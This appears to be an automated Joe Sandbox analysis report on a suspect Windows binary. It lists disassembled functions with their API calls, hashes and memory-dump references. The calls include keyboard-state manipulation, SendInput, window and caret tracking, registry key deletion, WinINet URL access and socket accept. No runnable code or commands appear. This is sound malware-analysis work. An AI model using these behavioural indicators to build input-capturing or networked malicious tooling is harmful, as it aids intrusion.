                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00F43BD1,?,00F43E06), ref: 00F43BE9
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F43BFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: a00628861f3e84506e02367fc35cc1487a2c2c0e8cd6bc96a5eff0c5d1572d96
                                                                                        • Instruction ID: 92620a9372c4aa23c662a05489cacd34aed2789ea9bc7957cbb1e1f761be1f51
                                                                                        • Opcode Fuzzy Hash: a00628861f3e84506e02367fc35cc1487a2c2c0e8cd6bc96a5eff0c5d1572d96
                                                                                        • Instruction Fuzzy Hash: CED0A7B0D007169FEB205FA1E848A03FEF8AB12328B204419E955E2151D7F0D480AE10
                                                                                        Function 00F19B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 634d8232b964556f6091018ac445491d8e996add42e154b18d93d577f77ea47b
                                                                                        • Instruction ID: c2c5fc8c698ae2e6586aecff2db33f6a528abb0fdbeb8c789fc70e6f18271ec2
                                                                                        • Opcode Fuzzy Hash: 634d8232b964556f6091018ac445491d8e996add42e154b18d93d577f77ea47b
                                                                                        • Instruction Fuzzy Hash: 3EC15C75E0421AEBCB14CF94C894AEEB7B5FF48710F104598E945AB291D770DE81EBE0
                                                                                        Function 00F3AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3AAB4
                                                                                        • CoUninitialize.OLE32 ref: 00F3AABF
                                                                                          • Part of subcall function 00F20213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2027B
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3AACA
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3AD9D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: 4243025f872d534e240eaabaec2331e63a96ad40784df4b927019e85efd86662
                                                                                        • Instruction ID: 76c372b1fccfce8e537de633c46cacbaae27162243384bb9be06df04c11c082a
                                                                                        • Opcode Fuzzy Hash: 4243025f872d534e240eaabaec2331e63a96ad40784df4b927019e85efd86662
                                                                                        • Instruction Fuzzy Hash: F1A15A356047059FCB11EF15C891B2EB7E4BF88760F144449FA9AAB3A2CB34ED44DB86
                                                                                        Function 00F191CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 8c7a4d4bf9fbcbeea2076857009859a729ca4816d7a524b23ba92af789a14c85
                                                                                        • Instruction ID: e59c5789232645c3650b6d374adb86441630501973cf8f25bdf35e28f60a09db
                                                                                        • Opcode Fuzzy Hash: 8c7a4d4bf9fbcbeea2076857009859a729ca4816d7a524b23ba92af789a14c85
                                                                                        • Instruction Fuzzy Hash: 38518531A083069BDB249F65D8B17AEB3E9EF44310F20981FE566D72D1DBB498C0B751
                                                                                        Function 00F0365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3877424927-0
                                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                        • Instruction ID: bc6ce6fa2b186f3970b89f649e801ccffbf8402392936213082b22c54497eb1b
                                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                        • Instruction Fuzzy Hash: CD51E3B1E04305ABDB288FA9CC84A6E77B9AF40330F248729F825862D0D7759F50FB50
                                                                                        Function 00F4C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01036D70,?), ref: 00F4C544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00F4C574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F4C5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 9ba86a0bb4c7aa2f84348694b865a909ffeb7aa0237e7ba17917d5bbcd8126de
                                                                                        • Instruction ID: 06c5ee084d920d8c650e368f709c75620373247c522678463e3d18cdfc2a3d53
                                                                                        • Opcode Fuzzy Hash: 9ba86a0bb4c7aa2f84348694b865a909ffeb7aa0237e7ba17917d5bbcd8126de
                                                                                        • Instruction Fuzzy Hash: BB515C75E01208AFCF10DF68C880AAE7BB5FB45320F159259F969DB290D770ED81EB90
                                                                                        Function 00F1C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F1C462
                                                                                        • __itow.LIBCMT ref: 00F1C49C
                                                                                          • Part of subcall function 00F1C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F1C753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F1C505
                                                                                        • __itow.LIBCMT ref: 00F1C55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 1256b2a4457489d0041c41883a04a3346ecd0d05ae7000b3330e90ebec5efb0e
                                                                                        • Instruction ID: 7fada2e0f6c29e78e1d91d55b6ab2909228cf6b5d0baed54e7f63aea22301adc
                                                                                        • Opcode Fuzzy Hash: 1256b2a4457489d0041c41883a04a3346ecd0d05ae7000b3330e90ebec5efb0e
                                                                                        • Instruction Fuzzy Hash: F841E571A4064CAFDF21DF55CC52BEE7BB9AF48710F000059FA05B7281DB749A85DBA2
                                                                                        Function 00F2390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F23966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F23982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00F239EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00F23A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 50d291df525f3359ec29fc69f788f708a294baf30fed91cf72bdf90e3c5d3b51
                                                                                        • Instruction ID: 9e37c85aa28367aee5c1d7e57d31c73cc4066780300910ec957ecbb1b5a1881a
                                                                                        • Opcode Fuzzy Hash: 50d291df525f3359ec29fc69f788f708a294baf30fed91cf72bdf90e3c5d3b51
                                                                                        • Instruction Fuzzy Hash: 69412AB0E04228AEEF208B64E8057FDBBB69B56320F04015AF4C1521C1C7BD8EC5FB65
                                                                                        Function 00F4B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F4B5D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: 169ac4ff8c77b992bd878b4746b01b7fd6ade9fbb90ccc720d20eb6d7281f400
                                                                                        • Instruction ID: 88279c371389b213c61a90fd130c03a0e36253a2ba6e5c528f61ecb29b23c23a
                                                                                        • Opcode Fuzzy Hash: 169ac4ff8c77b992bd878b4746b01b7fd6ade9fbb90ccc720d20eb6d7281f400
                                                                                        • Instruction Fuzzy Hash: D731E075A00208BFEF209F18CC89FA8BF65AB06360F598151FE15D62E3DB70E940BB51
                                                                                        Function 00F4D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00F4D807
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F4D87D
                                                                                        • PtInRect.USER32(?,?,00F4ED5A), ref: 00F4D88D
                                                                                        • MessageBeep.USER32(00000000), ref: 00F4D8FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 82a425fda7681fe6c2a2c5e926b48b4bc43f1f677f35312b965f741d9b0fc29c
                                                                                        • Instruction ID: d582f7b85cdaa99f60a5bb46a9f34dee4aa83dc7e876212be3e1d3cfb2c47538
                                                                                        • Opcode Fuzzy Hash: 82a425fda7681fe6c2a2c5e926b48b4bc43f1f677f35312b965f741d9b0fc29c
                                                                                        • Instruction Fuzzy Hash: 164189B5E00218DFCB11DF58D884BA9BBF5FB4A760F1981A9E815DB260D730E945EB40
                                                                                        Function 00F23A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00F23AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F23AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00F23B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00F23B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 4ce010b9087b99943b770376257b0439ab4e0b0d170fe85e2f5aff14cf66e6b8
                                                                                        • Instruction ID: b8e1c1deb3237540efbd0b2c4fc549e6c3a89ca2c1e691120c447fe92331d31a
                                                                                        • Opcode Fuzzy Hash: 4ce010b9087b99943b770376257b0439ab4e0b0d170fe85e2f5aff14cf66e6b8
                                                                                        • Instruction Fuzzy Hash: 6B3126B1E00278AEEF208F64AC197FD7BA59B95321F04011AE481931D1C77C8F85FB61
                                                                                        Function 00F14004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F14038
                                                                                        • __isleadbyte_l.LIBCMT ref: 00F14066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F14094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00F140CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: c2f1e598f35a445177e8d91f25bb6d33b6895983376a7451460ef109ecf7cf12
                                                                                        • Instruction ID: 1d848447d3bd1d199ef3185dfaa089f351c9ca732456fc2ecfff0faeca74e538
                                                                                        • Opcode Fuzzy Hash: c2f1e598f35a445177e8d91f25bb6d33b6895983376a7451460ef109ecf7cf12
                                                                                        • Instruction Fuzzy Hash: D431B431A00206AFDB219F76CC44BEA7BA5FF85320F154428E6659B191D731E8D1FB90
                                                                                        Function 00F47CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00F47CB9
                                                                                          • Part of subcall function 00F25F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F25F6F
                                                                                          • Part of subcall function 00F25F55: GetCurrentThreadId.KERNEL32 ref: 00F25F76
                                                                                          • Part of subcall function 00F25F55: AttachThreadInput.USER32(00000000,?,00F2781F), ref: 00F25F7D
                                                                                        • GetCaretPos.USER32(?), ref: 00F47CCA
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00F47D03
                                                                                        • GetForegroundWindow.USER32 ref: 00F47D09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 7ca7786ecc48c35fede1b4128bfa1b07d8046e5fe2d2ace7ff784535d2b98036
                                                                                        • Instruction ID: 8b73f735699c091860c9df70e4d6122d7d63e9309ea85b4c4d482f43bafcb81a
                                                                                        • Opcode Fuzzy Hash: 7ca7786ecc48c35fede1b4128bfa1b07d8046e5fe2d2ace7ff784535d2b98036
                                                                                        • Instruction Fuzzy Hash: 96312D72D00108AFCB00EFA5DC819EFFBF9EF94310B11846AE915E3211DB349E019BA0
                                                                                        Function 00F4F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetCursorPos.USER32(?), ref: 00F4F211
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F5E4C0,?,?,?,?,?), ref: 00F4F226
                                                                                        • GetCursorPos.USER32(?), ref: 00F4F270
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F5E4C0,?,?,?), ref: 00F4F2A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2864067406-0
                                                                                        • Opcode ID: dd87b657861fc13ef45cc414c82cdb9c71098fe4c8ddc6a3437453200ab74764
                                                                                        • Instruction ID: 6da389bb3564ebb931f18db68efdccbf5861f3323226009730c4039cb8907031
                                                                                        • Opcode Fuzzy Hash: dd87b657861fc13ef45cc414c82cdb9c71098fe4c8ddc6a3437453200ab74764
                                                                                        • Instruction Fuzzy Hash: 54218239A00018AFCB158F94C858EFA7FB5FF4A720F084065F909972A1D3749E51EB50
                                                                                        Function 00F3431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F34358
                                                                                          • Part of subcall function 00F343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F34401
                                                                                          • Part of subcall function 00F343E2: InternetCloseHandle.WININET(00000000), ref: 00F3449E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 20fedeccb28e75e50ec8bc58e83ea2953687c3d0bd93f614084f6adba5617baf
                                                                                        • Instruction ID: 06809163c3879038a41b0c32cb423e0461cb072716cdf98e3991fb4fc5afd29f
                                                                                        • Opcode Fuzzy Hash: 20fedeccb28e75e50ec8bc58e83ea2953687c3d0bd93f614084f6adba5617baf
                                                                                        • Instruction Fuzzy Hash: 4621A472604605BBDB159F609C00F7BBBA9FF44720F10401AFA1597650D771B821B7A1
                                                                                        Function 00F38A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F38AE0
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F38AF2
                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00F38AFF
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
